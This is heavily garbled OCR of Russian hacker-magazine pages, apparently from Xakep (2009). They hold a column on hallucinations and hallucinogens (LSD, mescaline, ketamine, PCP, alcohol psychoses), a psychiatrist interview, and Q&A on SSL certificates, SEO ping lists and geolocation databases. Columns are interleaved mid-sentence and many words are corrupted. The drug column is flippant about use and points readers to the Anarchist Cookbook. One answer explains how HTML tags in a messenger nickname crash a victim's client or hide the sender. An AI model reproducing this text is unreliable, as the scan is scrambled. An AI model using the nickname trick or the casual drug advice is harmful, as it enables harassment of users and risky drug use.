тему из предыдущего][ -Psycho
!статья "день Зависимости»! мы
рассмотрим тему галлюцинаций.
Начнем мы с рассмоч)ения клас­
сификации этих милых чудачеств
нашей психики IШJYка обширная
и заумная зато интересная и нуж­
ная\ а Затем перейдем кописанию
Состояний и способов ведущих к
появлению галлюцинаций.
ИСТИННЫЕ
ГАЛЛЮЦИНАЦИИ
Истиннаj1 галлюцинация - это
восприят~е без обьекта, при
котором, человек видит, слышит,
обоняет и ощущает то, чего не
сущесчует. Эти галлюцинации
«связаны» С органами чувств, они
могутбытьзрительными, слуховы­
ми, обонятельными и тактильны­
ми. Например, если человек видит
сидящего на стуле [на реальном
стуле) космического пришельца
- зто истинная зрительная гал­
люци наци я. Глюки эти не всегда
отличаются кинематографическим
сюжетом и захватывающей графи­
кой и "'10 ryт быть злементарными
- вспышки света, точки, молнии,
штрихи, линии и прочие примити­
В ы. Н есмотря на то, что исти Н Н ые
глюки воспринимаются совершен­
но естественно [или даже более
естественно, чем реальные обь­
~ 132
екты), часто человек оказывается
способен критически относиться
ксвqим галлюцинациям - напри­
мер, Крис Касперски, как только
начинает видеть В зеркале что-то
неправильное !СВОЙ хвост, напри­
Mepl, тут же идет пить нейролепти­
ческие колеса, которые избавляют
его от зрительных глюков После
этого он закидывается психости­
муляторами и садится работать за
комп.
К слуховым галлюцинациям от­
носятся как простейшие звуки,
шумы, обрывки слов или фраз,
так и полноценные моно- и диа­
логи. Эти разговоры могут как
комментировать про исходящее
[человек что-то делает, а «голос»
- комментирует; хорошим при­
мером может послужить голос
Ефима Копеляна, наэойливо
комментирующий действия
Штирлица в известном сериале),
так и угрожать (человеку или его
близкимl, приказывать ["воруй,
убивай, поджигай и вступай в
интимные отношения с гусями»].
Последние два вида наиболее
опасны, поскольку склоняют к
различным антисоциальным
действиям или самоповрежде­
нию.
Тактильные галлюцинации наш
подопытный испытывает, ощущая
несуществующие прикосновения,
щекотку, ползание насекомых по
телу. Больной может почувство­
вать, что его кто-то схватил Как
видишь, в основном тактильные
галлюцинации отрицательны
по своей сути - на ощущение
ползания по телу трех массажисток
из Та йланда пока еще никто не
жаловался.
ПСЕВДОГАЛЛЮЦИ­
НАЦИИ
Отличаются отистинных несвя­
занностью с KOH~peTHЫM органо"
чувств, человек их ощущает
каки,,-то внутренним, хитры"
чувством - в голове голос звучит
сам собой, там же появляются
неприличные или угрожающие
изображения, или вовсе кто-то
живет. Канонически" примером
псевдогаллюцинации можно
считать «карлика, который живет
в голове, правой ногой подпирает
извилины и мешает ду"ать». Сам
понимаешь, трудно придумать
орган чувств, который "ог бы
явить человеку такого злобного
инсайдера внутри собственного
теЛа
ФИЗИОЛОГИЧЕОКИЕ
ГАЛЛЮЦИНАЦИИ
Да, здоровыхлюдей тоже могутпо­
сещатьсамые наСТОЯЩlo\е глюки. К
абсолютной норме относятся:
• Гипна гогические и ГиПНОПОМПIo\­
ческие гаЛЛЮЦlo\нации. Первые 80З­
Нlo\каютпризасыпании, на границе
междусном и явью, вторые - при
пробуждении. Приведупример. Од­
нажды на дежурстве в больнице я
лег на AIo\BaH и попытался забыться
тревожным сном русского развед­
чика, как вдругуслышал громкий
стук в дверь. Этот стук высадил
меня на измену, я накинул халат и
стетоскоп и вылетел ... в совершенно
пустой и темный коридор. В дверь
никто не стучал - это был глюк
Кстати, яркие и приятн'ые оqразы,
которые мелькаютпереД глазами
В качестве резулыатадействия
опиатов или избытка зндорфИН08
после хорошего секса, глюками не
считаются. зто Io\MeHHO «образы»,
возника ющие в состоянlo\и легкой
полудремы .
• ДеПРИ8ацlo\Я сна - длительное
воздержание отсна в опреде­
ленном проценте случаев ведет к
зрительным и слуховым галлю­
цинациям. Психонавтами зтот
способ практикуется. Здоровью
не способствует и при менять
зтот способ не рекомендуется.
Во время сдачи номера вбылые
времена мы по двое суток сидели в
редакции, нодо глюковдосижи­
вать не удаsалось. ПодрЬбнее о
депривации сна можно прочитать
В статье «Над пропастью сновиде­
ний», опубликованной в майском
номерехза 2008 год .
• Галлюцинации в результате
претворения в жизнь хитрыхдыха­
тельных практик вроде голотроп­
ного дыхания.
Строго ГОВОРЯ,последние
два типа нельзя отнести к
варианту нормы, поскольку
провоцируются необычными
для человеческого организма
условиями
НАСТОЯЩИЕ
ГАЛЛЮЦИНОГЕНЫ
К тру-галл юци ногенам относятся
ЛСД [в советском девичестве - '
ДЛК-25, диэтиламид лезергино­
вой Кlo\слотыl, мескалин. псилоци­
бин 10\ фенциклидин Рассм.отрим
их по п О рядку.
лед
На самом деле с глюка генными
зффектами ЛСД человечество
познакомилось гораздо раньше
выделенt~я Альбертом Хофманном
чистого вещества. Дело втом, что.
ХАКЕР os /125/ 09
::::;:: Ирина Геннадьевна, один мой знакомый жалуется, что в зеркале ему часто

видятся всякие неправильные вещи. От настоящего отражения они явно далеки,

что делать, к кому обращаться?

И.Г.: Если знакомый точно понимает, что он видит в зеркале то, чего нетна самом деле

lи перепроверяя, убеждается, что никаких причин для появления в зеркале изображе­

ния не имеютl- ему остается только решить, насколько ему зто мешает. Пока это не ме­
шает окружающим - это только личное дело самого человека. Галлюцинации - а это
именно они - бывают разные. Пугающие, угрожающие, говорящие всякие гадости­
могут стать причиной весьма н еприятн ых пе реживаний и небла говидн ых поступ ков,
типа убийства соседей или порчи дорогого сердцу девайса. В случаеубийства соседей
спрашивать «что делать» будет уже поздно. Поэтому лучше пока все живы - прюа­
думаться над тем, ка к от этого безобраз ия избавиться. Самый простой и прямой пY'JЪ
- обратиться к психиатру. Можно даже к частному, хотя частник имеет право отка­
зать. «ПОТОt~У что психотические расстройства», возможна потребность влечебном
п ривязы ва н и и и укал ывании без согласия. Тогда - К государственному. Если психоз
подтвердится - придется смириться с получением диагноза и назначением лечения.

Несомненный плюс - велика вероятность, что в резулыателечения пугать иэ зеркала,

холодильника, Y'J'юга и стиральной машины перестанут.Жить станет приятнее.

::х:: Как на счет обращения в частную контору? Ну, чтобы без справок-реестров­
списков ...
И.Г.: Отчасти ответ на первый вопрос описывает эту ситуацию. Частный доктор не
имеет права применять меры принуждения, поэтому при малейшем намеке, что вам

иначе никак не получится помочь, отправит по адресу Возможно, вызовет подмогу,

ибо в тюрьму ему не хочется. Если у вас достало сообразительности добровольно
пойти за помощью - вполне может быть, что частникомдело и ограничится.

I : А может, само пройдет?

И.Г.: Увы, зто не простудное, само не пройдет. Тут ситуация однозначная - либо вы

одолеете болезнь, либо она одолеет вас. Третьего не дано.

::х::: Своими силами справиться точно не получится?

И.Г.: Если под своими силами понимать самостоятельные попытки напугать отра­

жение чертей в зеркале -так чертей зто не испугает. Они не на мирные переговоры

в ваше зеркало явились, можете мне поверить. Не верите - испытайте. Коварная

сущность психических расстройств в том, что они заводятся в самом дорогом - в

вашем моэге. Поэтому попытка "справиться самому» - зто примерно как вытаскива­

ние себя за волосы из болота. Звучит красиво. является основой для захватывающей

фантастики, но в жизни так не бывает. Законы физики не дают.

Х: Боюсь, в дурдом отправят:(

И.Г.: Если будете бояться слишком долго и перестанете понимать, что больны - от­

правят гарантировано, и спрашивать не будут. Пока есть ощущение болезненности

состояния. потребности в помощи - надо идти зту помощь получать. Болезнь не

станет спрашивать вас, когда ей перестать подчиняться вашим желаниям. Она, соб­

ственно, и без того им не подчиняется. Но пока можете позвать на помощь - сделай­

те это Не успеете - можете пострадать не только сами. но и покалечить кого-то еще.

Буквально.

::х::: д как же потом права получать, разрешение на оружие, на работу устраивать­

ся? «На учет» же поставят и справку не дадут?

И.Г: Честно сказать, ответ на этот вопрос всегда вызывает во мне некоторую борьбу.

С одной стороны, человек с психозом [чертей в зеркале при легких расстройствах

не бываетi эа рулем автомобиля или с пистолетом внушает профессиональные

опасения. Кто его знает, какой приказ он отсвоих «собеседников» получит или какую

картину увидит. Жертвы могут быть. С другой - ну не могу я без конкретной ситуации

сказать, как будут развиваться события в случае конкретного пациента. Невротиче­

ские расстройства хорошо поддаются излечению, всякие долгоиграющие послед­

ствия при этом практически исклюцены, а при обращении кчастномуспециалисту

- исключены полностью.

Решите, что для вас важнее - риски вашего состояния сейчас [если под влиянием
бреда или депрессии вы прыгнете с крыши - вряд ли в будущем вам понадобятся
Еюдительские права! или иллюзорные перспективы «через 20 лет». Эти 20летнадо
еще прожить ...
 ·.=- ..... unit$
наряду С другими алкалоидами.
ДЛ К содержится в спорынье
паразитическом грибке, пора­
жающем злаковые растения. В
стародавние времена спорынья,
содержащаяся во ржи и прочих
полезных компонентах хлеба,
вызывала целы
e эпидемии - упо­
.. требивший сию скорбную пищу
пейзанин страдал отприступов
страха, тревоги и беспокойства,
плавно переходящих в судоро­
ги, галлюцинации, помрачение
сознания. При употреблении
хорошей дозы спорыньи отравле­
ние приводило ксмерти подо­
пытного [в зараженном хлебе с
дозой было все в порядке], а сами
галлюцинации, как видно, в этом
симптомокомплексе играли не
самое важное значение, поэтому
торчки древнего мира к спорынье
относились с подозрением. Тем бо­
лее, что в средние веКа глю кующих
това ри щей вполне могли возвести
на костер как одержимых.
ОБЕЩАННАЯ КНИГАХОФМАННА.
РУССКИЙ ПЕРЕВОД СУЩЕСТВУЕТ И ДОСТУПЕН
ДЛЯСКАЧИВАНИЯ
~1З4
__ С:\РRОGZ\Остатин былой РОСКОШИu.ANGUАGЕ\lV\IМ1\1мwl'u\VIRDЕМО ---
­
~ 11' р_к L ГОО<Н 1iliJ-
,'~pet:~ ЬС:\PRОGZ'\ос.Т.rno;J16~~~LJAG::\IV\IМl1,Iн\RE,LдX\VlAD[мО
---.::=. HH;jtfl
СРЕДИ ДЕМОК, ВЫДРАННЫХ ИЗ СТАРЫХ ВИРУСОВ,. В МОЕМ АРХИВЕ ТАИТСЯ
ЭФФЕКТ ИЗ ВИРУСА «lSD». ВСЕ ЭТИ ДЕМКИ ЖДУТ ТЕБЯ НА НАШЕМ ДИСКЕ!
,
Интерес к чистому ЛСД возник
сразу после изоляции чистого
вещества вышеуказанным шве~l­
царским ученым. Строго говоря,
довольно ПЛОТНО им интересовал­
ся и сам АльбертХофманн;) - дан­
ное вещество ОН употреблял как
лично, таки в компании коллег, со
свойственной ученым скрупулез­
ностью описывая свои ощущения в
лабораторном журнале. Поскольку
обьем статьи не безграничен,
я советую тебе скачать книгу от
основателя под названием «лед
- мой трудный ребенок» [LSD: ту
ргоЫеm child) - очень качествен­
ноенаучноесочинение.
Что же касается общественного
интереса, то кЛСД обратили свои
взоры психиатры и психотера­
певты, врачи и военные, люди
искусства и обычные психонавты.
Любителей словить галюнов
прельщала забавная перспек­
тива: ПрИНЯ8ШИЙ дозу человек
испытывает очень красочные
галлюцинации [тематика ихзави­
сит от психического и умственного
состояния подопытного) - начи­
ная от злементарных зрительных и
заканчивая яркими, необычными
образами и сказочными геометри­
ческими фигурами [которые видно
и с закрытыми глазамиJ. В за­
висимости от дозы и состояния по­
допытного могут появиться трудно
передаваемые словами ощущения
деперсонализаЦИИ,растворения
собственного «Я» ВО внешнем
- [)tQj~
lv'~_flepeXOA
'д"'"
Гlpl1ю-<~~~Нj-DQS
2К6
ПР'Im:tеН'I':!N5-00'S
61<6
5tuOOW
Г1pJm~",!:~ 1\15-005
! КБ
мире, парадоксальные ощуще­
ния вроде "обоняния музыки».
При этом наш подопытный может
исп ыты вать постоя н ную смену на­
строен'IЙ - от ужаса до экстаза и
наоборот Критическое отношение
к переживаНИRМ обычно сохра­
нено [т.е. психонавтпонимает, что
переживаемое им невзз'правду;
часто это зависит от дозыJ, но
иногда возникае'Г бред, и человек
становится рабом св'оих пережи­
ваний, которые могутпривести к
социальной опасности - несмотря
на то, ЧТО Пр'lнятая на фоне при­
ятного душевного настроя кислота
чаще дает скаэочные, яркие и
необычные картинки, встречаЮТСR
'1 более чем пугающие ощущения.
В качестве ложки дегтя хотелось
бы отметить депрессию, отме­
чающуюся у злоупотребляющих
после трипа, и Д080ЛЬНО быстро
развивающуюся психическую за­
висимость.
МЕСКАЛИН
Эпический галлюциноген,содер­
жащийся в кактусах пейоте и Сан­
Педро. В нашей стране приобрел
известностьблагодаря нес;колько
контркультурнойкниге под на­
званием "Поваренная книга анар­
хиста». 8данном издании [кстати,
его целевая аудитория - аовсе не
анархисты, а просто интересующи­
еся молодые люди, так что смело
ищи ее в интернете. Я читал э'гу
книгу в бумажном варианте еще в
ХАКЕР 05 11251 09
«DIGIТALSURROUND REALIТY» СИМВОЛИЗИРУЕТ ХАРАКТЕРНЫЕ ДЛЯ КИСЛОТЫ
«СЛЫШУИЗОБРАЖЕНИЕ» И ~<ОЩУЩАЮЗВУК»

транквилизаторов. Разумеется, самиздат авторства О. Мальского,

лед в РОЛИ ХИМИЧЕСКОГО
для психонавтов подобная профи­ легко находится гуглом], Из нееты
ОРУ>КИЯ
лактика совершенно неактуальна, узнаешь, что советские доктора

поэтому кетамин они употребляют соблазнять женщин умели'

с военной точки зрения производные лезергиновой кислоты напрямую - либо сливая препарат шампанское С кетамином - это

относятся к оружию массового поражения из групп ПСИХОllfИ­ на кишку, либо втягивая порошок В тебе не ликер "Бейлиз» с водкой
метических ядов. хобот. Бывалыеторчки пишут. что смешивать:!.
t
Его достоинства - низкая доза (достаточно нескольких тысяч для кетаминоsого оттяга большое Что касается фенциклидина, то

молекул на человека, - вдумайся в эту фразу, сопоставь ее с значение имеетустановка на кайф, по его поводу можно сказать сле­

миллиардами нейронов), высокая эффективность (без башни не позитивный психический настрой дующее. Во-первых, именноон [а
повоюешь) и нелетальность (людей никто не травит, не парализует и хорошая музыка [в принципе, вовсе не кокаин) первым в ИСТОрl<И
и не обжигает). для всех галлюциногенов это заслужил кличку"ангельская

актуально, посколькутематика для пыль».Данное зелье также на­

галюнов вычисляется головным чинало свою историю с аптечной
Доинтернетные времена) очень ПСИЛОЦИБИН мозгом не с бухты-барахты, а из полки, формально относясь к
красочно расписаны ощущения и за это веществомы должны конкретного опыта. воспоминаний группе обезболивающих средств.
автора отупотребления пейота ­ сказатьспасибошвейчарскому и настрояl. Состояние зйфории для В качествелекарственного сред­

во-первых, он исступленно блевал химикуАльбертуХофманнуГаллю­ кетамина нехарактерно. а харак­ ства оноотличалось избыточным
в специально выкопанную ямку циногенныйэффект псилоцибина, терно - ощущение распада мира количеством побочных эффектов,
[пейот - мощное рвотное сред­ содержащегос.яв нескольких видах и музыки на кусочки, составные а вотс точки зрения психонавтов

ство). а во-вторых - испытывал грибоs. в целом похож как на ЛСД части, ощущение вращения пред­ - наоборот, оказалось весьма
галлюцинации. Ничего необычно­ [по словам очевидцеs - менее метов вокруг себя Видения также позитивным - хорошо вставляет,

го в них нет- на фоне общей за­
торможенности возникают глюки
различной (часто - религиознойi
тематики, ощущение «видения
себя со стороны». "Религиозным»
свойством активно пользовались
давние потребители колючей
дряни -древние индейцы. Более­
менее современный индеец по
яркий, более естественный), так и
на мескалиновыетрипы.
КЕТАМИН И ФЕНЦИ
КЛИДИН
Совершенно приличные веще­
ства, по роду своему и племени
относящиеся к лекарственным
средствам. Кетамин и сейчас
не эйфоричны и могут БЫ1Ъ даже
пугающи. но страх этот не фикси­
рует на себе нашего подопытного
и не оставляет неприятного осадка
В душе после трипа, поэтому ни­
какого дискомфорта в этом плане
нарки не отмечают. В принципе,
кетаминовая наркомания сейчас
не так распространена, как в ВО-е,
легко про изводится И комбиниру­
ется с другой на ркотой.
АЛКОГОЛ1ЬНЫЕ
ТРИПЫ
Как выглядит с точки зрения
обывателя напивающийся до
глюков человечище? Выглядит
онтак:«некийкалдырьпьетден~

имени Дон Хуан, по слухам, при­ используется как средство для когда этот препарат было гораздо пьет два, пьет неделю. Мешает

бегал к атому средству в процессе внутривенного наркоза, а для проще достать. К сожалению, напитки, переходит на дешевое

обучения Карлоса Кастанеды. что, предупреждения его га)lЛЮЦИ­ вте времена им баловались и спиртное, настойку боярышника,
очевидно. не могло не оказать ногенных и психоизменяющих некоторые доктора. Об ЭТОм ты антифриз. морилку И политуру и
своего влияния на головной мозг побочных зффеКТО8 врачи npaK­ можешь прочесть в книге«Три не­ В итоге допивается до белочки».
данного графомана. тикуют совместное назначение дели из жизни лепилы» [зачетный Особо продвинутые обыватели

ХАКЕР 05 /125/ 09 ~1З5

КЕТАМИН: ВЫБИРАЙ ЛЮБОЙ!

используют популяризован~ый

советским кинематографом тер­

мин «делириум тременс». Однако,

:JC - не обывательский журнал,

поэтому вопросы алкогольных

изменений сознания мы с тобой

сейчас обсудим по-честному:

Белая горячка Idelirium lг·еmепsl.

Расстройство, знакомое нам с

детства по фильму"Кавказская
пленница», где геройДемьяненко,

перепивL!.JИЙ винца на веселом

кавказском празднике, по протек­

циикоррумпированныхчиновни­

ков залетает а психиатрическую

больницу с зтим самым диагнозом.

Так Bo;r, все врут, и этот класси­

ческий фильм - не исключение.
Во-первых, белочка - достояние
настоящих, состоявшихся в жизни

алкоголиков со сформированной
физической эависимостью и
ПСИХИЧЕСКАЯ ЗАВИСИМОСТЬ iHE ЗАСТАВЛЯЕТ СЕБЯ ЖДАТЬ
абстинентным СИНДромом Iпом­
нишь ПР9ШЛУЮ статью?]. Типич­
ный клиентбелочки - алконавт, компьютерногодела -задача ные персонажи - пауки, змеи, воздеЙСТВLo\ем, огнестрельным Lo\
переста,ВШИЙ употреблять питие, позитивная. Кстати, это явление черви, летучие обезьяны и тому холодным ОРУЖLo\ем, очищающLo\М

либо снизивший его дозу [немного
забухаlj,ШИЙ трезвенник белочкой
болеть неспособенi. На З-4день
после запоя 'а не во время eroly
пьяницы на фоне его обычныхаб­
стинентныхсимптомов появляется
относится к иллюзиям).
Поначалу эти элементарные галю­
ны возникаюттолько в вечернее
8ремя, отступая днем, что дает
нашему подопытному некоторый
шанс обратиться за медицинской
подобная нечисть, отрицательные
персонажLo\ из потустороннего
мира - черти и демоны (фраза
«гонять чертей» В народе исполь­
sуется не зряl, отрицательные
персонажи из мира реального
пламенемl. Кстати, факт борьбы с
порождениями нездоровой души
совсем не гарантирует безопасно­
сти окружающих - в жене безумцу
видится чеченский террорист. а
кошка - вовсе не кошка, но злой

страх, тревожность,змоциональ­ помощью. Со временем проблема - международные террористы, космический монстр. На окне уже
ная неУСТОЙЧИВОС1Ъ,постепенно прогрессирует, галлюцинации чеченцы, вражеские снайперы лежат OCTaHKLo\ трупов съеденных

появляются герои нашего сегод­ обретают сложность, реальность, и сомалийские пираты, которых иубиенных, с карниза СВLo\сают
нР.шнего повествования.Сначала сюжет, они начинаЮТПРОЯ8ЛЯТЬСЯ наш алкоголический друг с удо­ кишки, а цветочный горшок на­
герои эти злементарны - звуки, И днем. Характер галлюцинаций. вольстаием проецирует в свою. полнен КрОВЬЮ до самых краев.

шорохи, шумы [наверняка, порож­ как нетрудно догадаться, почти реальную.обстановку. Все эти Quake отдыхает. В общем. со­
денные Букой или Бя I<,ой , которые. всегда пугающий. Все зависит от гаЛЛЮЦLo\нации очень красочны, стояние это опасное, поскольку

прячутся там, эа эанавеской !I, сохранившихся вычислительных убедительны и пугающи - одер­ галлюцинации в нем тесно свя­

тени, вспышки света идвижения способностей головного КОfща жимый алкогольным демоном заны с бредом воздействия и/или
обычно неподвижного рисунка на подопытного и воспоминаний И:У человек совершенно реально преследования, что провоцирует

обоях, паласе и кафеле·[т.е. мозг его прошлой жизни Ic чем стал­ бежит, скрывается, борется с клиента на опасные действия. С
совершает работу по анимации не­ кивался, чего боялсяi. Обычно в ними всеми доступными способа­ подобнымLo\ персонажами обуче­
подвижных текстур, сточкй зрения глюках ПРLo\сутствуют зооморф­ ми lигрой в прятки, физическим ны взаимодействовать советские

~ 1з6 ХАКЕР 06 /126/ 09

СЕРИЯ «ДОКТОРХАУС», В КОТОРОЙ 16-ЛЕТНИЙ СУРОВЫЙ КАКТУС САН-ПЕДРО ВНУШАЕТ ПОЧТЕНИЕ
ШКОЛЬНИК, СТРАДАЮЩИЙ ОТ ГАЛЛЮЦИНА­
ЦИЙ, ПОЛУЧАЕТ ТЯЖЕЛУЮ ТРАВМУ ВО ВРЕМЯ
ИГРЫ В ЛАКРОСС

милиционеры и бригады психиа­ него, галюны в рамках него автора в истории З0мбоящикаj. дозы алкоголя /50-150 грамм
тров «03", РЯДОВЫМ гражданам с преимущественно слуховые Воистину жестокое наказание водочки] подопытный вдруг резко
ними лучше не пересекаться I~ в - алик слышит голоса, - ком­ за пьянствоl В большинстве слу­ дезориентируется, впадает а

переубеждающиебеседы не всту­ ментирующие, прикаэываЮЩ~lе, чаев у безумца остается критика свои собственные, не относя­
пать [бредящего человека нельэя обсуждающие Иногда этих го­ к происходящему [в отличие от щиеся к реальной обстановке,

переубеД~IТЬлогическиl.У него лосов несколько, они вступают в делирия, больной понимает его переживания, дейсгвует сооб­

свои rлюки, у нас свои J высоконаучный диспут, благода­ иллюзорность]. Например, од­ разно искаженной нездоровым
ря чему наш подопытный может нажды ко мне в больницу пришел сознанием обстановке, стано­
Алкогольны
й галлюциноз. стать перманентным участником допившийся до глюков дяденька, вится суетл ивым, выкри кивает

Более спокойное психотическое раi;\иоверсии шоу Малахова­ которого очень беспокоила зву­ отдельные слова ~I фразы lобычно
расстройство, основное про­ младшего [родственные отно­ чащая В голове музыка Причем, угрожающего или приказного

явление которого - истинные шения Малаховых не доказаны. с его слов. музыку ОН мог за­ xapaKTepal- знай, это оно и есть.
rаллюцинации. Возникает оно возможно, эта новость порожде­ казыватьсам. поэтомуя не сразу Начинается расстройство внезап­
как во время запоя. T~K и после на недостаточными познаниями понял су'ГЬ его недовольства (на но и внезапно же эаканчивается

плеере он всяко может сэконо­ - глубоким, здоровым сном, по

мить). Так или иначе, пришлось окончанию которого клиент либо

Х-ГЛОССАРИЙ вызват;ь психиатров, они по­ не помнит случившегося совсем,

слушали больного. посмеялись. либо сохраняет лишь отры вочные

П с и х о н АВТ - человек, занимающийся исследованием своего да и забрали его в дом с желтыми вое поми на Н и я о былом содо I·~ И че­
сознания и использующий ДЛЯ этого различные методики, в том окнами. ском угаре

числе несистематическое употребление психоактивных веществ, Не всегда алкогольный галлю­

стараясьпри этом избежать наркотической зависимости. циноз протекаетс однимилишь ЗАКЛЮЧЕНИЕ

глюками, бываеттак. что они На этом торжественном, алкоголь­

П с и хоз Ы - группа психических расстройств, сопровождающихся . становятся участниками бреда ном слове я заканчива ю свое се­

ПРОДУКТИВНОЙ психопатологической симптоматикой - бредом, преследования или отношения годняшнее повествоаа ние Веди
галлюцинациями, псевдогаллюцинациями'и др. «Продукция» В (особенно если голоса угро­ себя хорошо, кислотой не злоупо­

данном СЛyiше-'вовсе не положительный термин, Грубо говоря, жающие). Кроме того, он может требляй, до белочки не допивай­

01;/ означает, что мозг производит всякую фигню вместо правиль­ СОПРО60ждаться тревогой и/или ся, в объятия сект-поклонников

Hыx мыслей. депрессией. В отличие отбелочки. голотропного дыхания и всяких

rаллюциноз может радовать боль­ галлюциногенн ых медитаций

БРЕД не поддающееся логической коррекции умозаключение, ного хронически (месяцами). не попадаися I А если в резуль­

Иначе говоря, если человек думает. что микроволновая печь воз­ тате чтения ::х::ты приблизился
действует на его мозг космическими лучами, и переубедить его Патологическое опьянение. куровню Криса Касперски не

никак невозможно - это бред и есть. Переубеждать бредящего Это остро развившееся психо­ только в умственно- техн ическом.

смысла не имеет, твои аргументы он включит в структуру бреда, тическое расстройство на фоне но и в душевном плане, не от­

про'сто не воспримет или даже тебя поколотит. приема небольшихдозалкоголя. чаиваЙся.Во-первых, немножко
В отличие от предыдущих трипав, ГЛЮКОВ ~ не такая высокая плата

НЕЙРОЛЕПТИI<И (Антипсихотические препараты] - веселые данное расстройство обычно за гениальность, а во-вторых­

препараты, применяющиесядлялечения психозов, К былинным, возникаету людей, алкоголиз­ цивилизация сделала совре­

стоявшим на вооружении карательных психиатров древности ан­ мом не страдающих и кзапоям с менных психиатров слаБЫМ~I, а
типсихотикам относят аминазин и галоперндол. В настоящее время абстинухой не склонных. Имеет демократия и гласность погасили

их синтезировано настолько много, что даже не имеет смысла пере­ оно несколько форм, в рамках этой огонь в их душах; насильствеГlНО

числять, Кстати, при отсутствии нейролептиков наказательные статьи нам интересна только одна вдурдом можнозагреметыолько

психиатры практиковали введение в крупные мышцы тела раство­ - галлюцинаторно-параноидная с суицидальной поп ыткой или
расеры в персИl(ОВОМ масле. Уколы этого зелья резко болезненнь/, форма патологического опьяне­ обществеННО-ОI'1асным поведе­
что ограничивает основные движения, «успокаивая» больного. ния. Распознать эту форму просто: нием. Все остальное - строго по
если после приема небольшой желанию.::Х;

ХАКЕР 06/126/09 ~1З7

 ~. > IJrli~s

OJ)
о о

GJ) ~

о
о о
~ о
~
О
о

/
о

О: Хочу новить К себе на сайт полноценный А: Если ты заядлый польЗ0ватель WordPress rpc.icerocket.com:10080/

SSL-сертифи воэножноли по сделать

[ну, или любой другой блоговой платформы), ping.blogs.yandex.ru/RPC2

бесплатно?
то, помимо стандартного !lttp:Urpc.pingomatic.
А, Соорудить полноце ный SSL -сертификат
сом, сове'Гую 8 список пингуемых сервисов Все перечислеГlГlыесервисы оченьлюбят
бесплатно утебя врядл де получится /если.
добавить следующие сайты: поисковики,так что, добавляя новую статью
конечно. не считать таков м самоподписанный на свой блог, будьувереГl,что ПОЛь30вателис
сертификат!. но вот заказат оный стриальны­ blogsearch.google.com/ping/RPC2
легкостью смогут найти ее.
ми ограничениями на30 или 90дней вполне api.feedster.com/ping

позволю замечательный сер ис http:Uwww api.my.yahoo.com/RPC2

а, ЗанинаюсьпоисКовойоптимизацией.Где бы

freessl.slJ. api.my.yahoo.com/rss/ping
наЙ1fИ списокактуальныхIP-аАресови строк с

Данный сервис позволяетбе платно ПОлу4ИТЬ blogdigger.com/RPC2

UserАgепt поисковыхроботов?

полноцеГlГlЫЙ SSL-сертифик со срокомдейс­ blogsl1ares. com/rpc .рl1Р

А, Такую услугу тебе с радостью предоставить

твия30дней [TrialSSL] и серт фикатспровер­ blogstreet.com/xrbin/xmlrpc.cgi

замечательныйбуржуйский порыл iplists.com.

кой по домену FreeSSL со ср ком действия 90 coreblog.org/ping/

Самое главное, что ты здесь сможешь найти,

дней. Сертификат предназ а4ен для тестиро­ ping.blo.gs/

это:

вания теХнИ4еской инфра ТРУКТУРЫ дО покупки ping.feedburner.com

1. Google IP Llst - валидный список IP-аАресов
коммерческого SSL-cep ификата. Сертификат ping. syndic8. com/xmlrpc .Р!1Р
и юзерагентов, под которыми Гуглобот любит
выпускается втечени нескольких минут Для ping. weblogalot. com/rpc. php
индексировать сайты;
его получения теб сего лишь необходимо рордех. com/addsite .рl1Р
2. Yahoo, Lycos,lnfoSeek, Alta Vista, Excite,
предоставить ои [ну. или не совсем свои:) rpc.blogrolling.ccm/pinger/
Northern Light 'Р List - списки аЙпv.шников
дaГlГlыe: к \актноелицо, e-ma\l, телефон. rpc.technorati.com/rpc/ping
соответствующих поисков и ков.

rpc.weblogs.com/RPC2
Также сервис поэволит тебе добавить свои
: Какие сервисы для оповещение поискови­ topicexcl1ange. com/RPC2
айпи и юзерагенты для разоблачения ковар­
ков об обновлениях на моем сmью
j])tиr1tJ1Ш1!rrI!»IIаеwь? V xping.pubsub.com/pingl

api .l110reoyer. com/ping­

ных поисковых роботов. Удачи на поприще
SEOI

ХДКЕР 06/126/09
 v
О GJ)
о

O,HeТilKдaBHoBo ци ль CTPa~aдан ы моментлучше оптимизи­ А: К орится, 8рага надо знать в л~.

была 06каруженауязвимо ь, пр водящая к за­ роваБПОДКОНС)IЙзапрос. Ит к, пред тавляютебе небольшой спис
,внсанмю компа жертвы асс и поподробкеЙ. на более спространенных аjах-библ тек от
А,ДействитеЛЬНО,оче ной замечательный а: Расскажи,каким образомBe~aера опре­ одног зрезервистовАнтичата lifejs_ it
багваське (на этот pa~ 6 и 6.51 нашли деляютреалькое физическоеп ожениесвоего

Hormold и Ооот 123. ~г позволяет про­ посетитеЛА?

1.Atlas -ASP.NET АJАХ6иблиотекаот Microsoft
вести удаленную DoS-атаку. Для зксплуатации А,Длятаких целей знтузиастамии професси·
IhНQ :UWW'.'1.a5p. net /3 jax/Oefa u lt .а" охl
уязвимости необходимо добавить в свой ник оналами созданы различные геолокационные + asp
html-Ter<<</a>>>. а затем добавиться в контакт­ базы данных IP-аАресов (в формате«Город/ - сыровата

листжертвы, либо отправить жертве любое Страна -IP"J. ИЗ всех предложений.при­ - недостаточно гибкая

сообщение или запрос авторизации Iплюс. сутствующихв интернете, мне больше 8сего
если жертва найдеттебя в поиске и посмотрит нравится бесплатная WIP-Base от \NI РГГ!дПl<J 2. OOJo -Jаvаsспрt инструментарий [h11Q;LL
твое инфо).
СОГП (остальные GеоlР·базы ты легко сможешь dоюtQQlkJt.огаJ

)
Также с помощью зтого бага можно сделать но­
мер невидимку 8 контакт-листе всетой же не­

счестной жертвы. Попробуй свой ник ПрИ8есТи

к виду <<<h 1> Пlсk</h 1", и попрОCVIТЬ, чтобы тебе
погуглить caMJ. Данная база данных, какты уже
понял, дает 80ЗМОЖНОСГЬ определен ия физи­
ческого расположения различных IP-аАресов.

Алюблю я ееза следующие фишки:

+ много возможностей
...
+
присутствуетхороший мануал
поддержка различных сред исполнения

добавили. В итоге, ты будешь присутствоватьв 1. О на доступ на в SQL, ею R. текстовом форма­
контакт-листе[к примеру, в «Моя группа [1/1 )"J, тах:
но тебя просто-напросто не будет видно :]. Под­ 2. Обновление WIР-базы осуществляется
робнее об уязви мости ты сможешь проч итать каждые два месяца;
тут: sесuгitуlаЬ.гu/vulпегаЬilit\l/368757 .QhQ и тут: 3. Проверкабазы может происходитьавтомати­
forum.asecl)ka.ru/shov;lhread.QhQ?t= 110269. чески и мануально.
Также советую обратить внимание на другие
О, Хочу моннтормть свой сайт ка предметучас­ различные примочки к базе: WIP-АРllудобное
тия в выдаче помсковыхсмстем. Как это проще апи для разработчиков),WIР-Рlugiп [WorldlP
